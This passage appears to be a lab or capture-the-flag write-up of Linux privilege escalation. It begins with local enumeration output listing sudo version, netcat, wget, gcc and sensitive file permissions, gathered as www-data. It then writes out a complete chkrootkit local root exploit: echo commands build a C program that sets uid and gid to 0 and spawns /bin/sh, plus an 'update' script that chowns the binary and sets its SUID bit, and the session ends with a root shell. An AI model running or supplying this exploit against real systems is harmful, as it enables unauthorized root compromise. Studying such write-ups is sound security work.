-rwxr-xr-x  1 root root  567 Jul 26  2012 stop-bootlogd
-rwxr-xr-x  1 root root 1143 Jul 26  2012 stop-bootlogd-single
-rwxr-xr-x  1 root root  700 May 23  2012 sudo
lrwxrwxrwx  1 root root   21 Jul 19  2013 udev -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jul 19  2013 udev-fallback-graphics -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jul 19  2013 udev-finish -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jul 19  2013 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jul 19  2013 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Apr  5  2012 ufw -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 2800 Jul 26  2012 umountfs
-rwxr-xr-x  1 root root 2211 Jul 26  2012 umountnfs.sh
-rwxr-xr-x  1 root root 2926 Jul 26  2012 umountroot
-rwxr-xr-x  1 root root 1985 Jul 26  2012 urandom


### SOFTWARE #############################################
Sudo version:
Sudo version 1.8.3p1


### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc


Installed compilers:
ii  gcc                             4:4.6.3-1ubuntu5                  GNU C compiler
ii  gcc-4.6                         4.6.3-1ubuntu5                    GNU C compiler


Can we read/write sensitive files:
-rw-r--r-- 1 root root 953 Apr 12  2016 /etc/passwd
-rw-r--r-- 1 root root 620 Mar 30  2016 /etc/group
-rw-r--r-- 1 root root 665 Mar 30  2016 /etc/profile
-rw-r----- 1 root shadow 810 Apr 25  2016 /etc/shadow


Can't search *.conf files as no keyword was entered

Can't search *.log files as no keyword was entered

Can't search *.ini files as no keyword was entered

All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 604 Oct 19  2011 /etc/deluser.conf
-rw-r--r-- 1 root root 350 Mar 30  2016 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 552 Feb  8  2012 /etc/pam.conf
-rw-r--r-- 1 root root 144 Mar 30  2016 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1260 May  2  2011 /etc/ucf.conf
-rw-r--r-- 1 root root 3343 Sep 30  2013 /etc/gai.conf
-rw-r--r-- 1 root root 92 Apr 19  2012 /etc/host.conf
-rw-r--r-- 1 root root 321 Mar 29  2012 /etc/blkid.conf
-rw-r--r-- 1 root root 475 Apr 19  2012 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2083 Oct 16  2013 /etc/sysctl.conf
-rw-r--r-- 1 root root 1263 Sep  5  2013 /etc/rsyslog.conf
-rw-r--r-- 1 root root 4728 May  2  2012 /etc/hdparm.conf
-rw-r----- 1 root fuse 216 Oct 18  2011 /etc/fuse.conf
-rw-r--r-- 1 root root 56 Apr 12  2016 /etc/chkrootkit.conf
-rw-r--r-- 1 root root 2981 Mar 30  2016 /etc/adduser.conf
-rw-r--r-- 1 root root 6961 Mar 30  2016 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 956 Mar 30  2012 /etc/mke2fs.conf
-rw-r--r-- 1 root root 333 Mar 30  2016 /etc/updatedb.conf
-rw-r--r-- 1 root root 599 Oct  4  2011 /etc/logrotate.conf
-rw-r--r-- 1 root root 2969 Mar 15  2012 /etc/debconf.conf
-rw-r--r-- 1 root root 15752 Jul 25  2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 34 Mar 30  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 839 Apr  9  2012 /etc/insserv.conf


Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Mar 30  2016 .
drwxr-xr-x 12 root root 4096 Apr 26  2016 ..


### SCAN COMPLETE ####################################
www-data@ubuntu:/tmp$


dpkg -l | grep chkrootkit
rc  chkrootkit                      0.49-4ubuntu1.1                   rootkit detector

echo 'int main(void)' > test.c
echo '{ ' >> test.c
echo 'setgid(0);' >> test.c
echo 'setuid(0);' >> test.c
echo 'execl("/bin/sh", "sh", 0);' >> test.c
echo '}' >> test.c

echo '#!/bin/bash' > update
echo 'chown root /tmp/test' >> update
echo 'chgrp root /tmp/test' >> update
echo 'chmod u+s /tmp/test' >> update

gcc test.c -o test
gcc test.c -o test
test.c: In function 'main':
test.c:5:1: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
test.c:5:1: warning: missing sentinel in function call [-Wformat]

www-data@ubuntu:/tmp$ run-parts

drwxr-xr-x 22 root     root      4096 Mar 30  2016 ..
-rwxr-xr-x  1 www-data www-data 40155 Jan  5 09:42 1.sh
-rw-r--r--  1 www-data www-data 40155 Jan  5 09:43 2.py
-rw-r--r--  1 www-data www-data 36801 Jan  5 09:43 3.sh
-rw-r--r--  1 www-data www-data  5123 Jan  5 09:48 37292.c
drwxrwxrwt  2 root     root      4096 Jan  5 09:41 VMwareDnD
srwxr-xr-x  1 www-data www-data     0 Jan  5 09:41 php.socket-0
-rwsrwxrwx  1 root     root      7235 Jan  5 09:59 test
-rw-rw-rw-  1 www-data www-data    69 Jan  5 09:56 test.c
-rw-rw-rw-  1 www-data www-data     2 Jan  5 09:55 test.cls
-rwxrwxrwx  1 www-data www-data    74 Jan  5 09:57 update
-rw-rw-rw-  1 www-data www-data    20 Jan  5 09:56 updatels
-rw-r--r--  1 root     root      1600 Jan  5 09:41 vgauthsvclog.txt.0
drwx------  2 root     root      4096 Jan  5 09:41 vmware-root

www-data@ubuntu:/tmp$ ./test
./test
whoami
root


Regards,
Yuriy Stanchev/URIX